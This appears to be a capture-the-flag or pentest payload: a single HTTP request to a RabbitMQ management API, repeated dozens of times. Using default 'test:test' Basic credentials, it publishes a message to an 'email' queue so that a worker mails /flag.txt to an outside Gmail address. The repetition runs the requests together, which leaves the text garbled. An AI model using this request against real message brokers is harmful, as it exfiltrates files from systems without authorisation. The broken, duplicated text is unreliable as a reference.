+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + 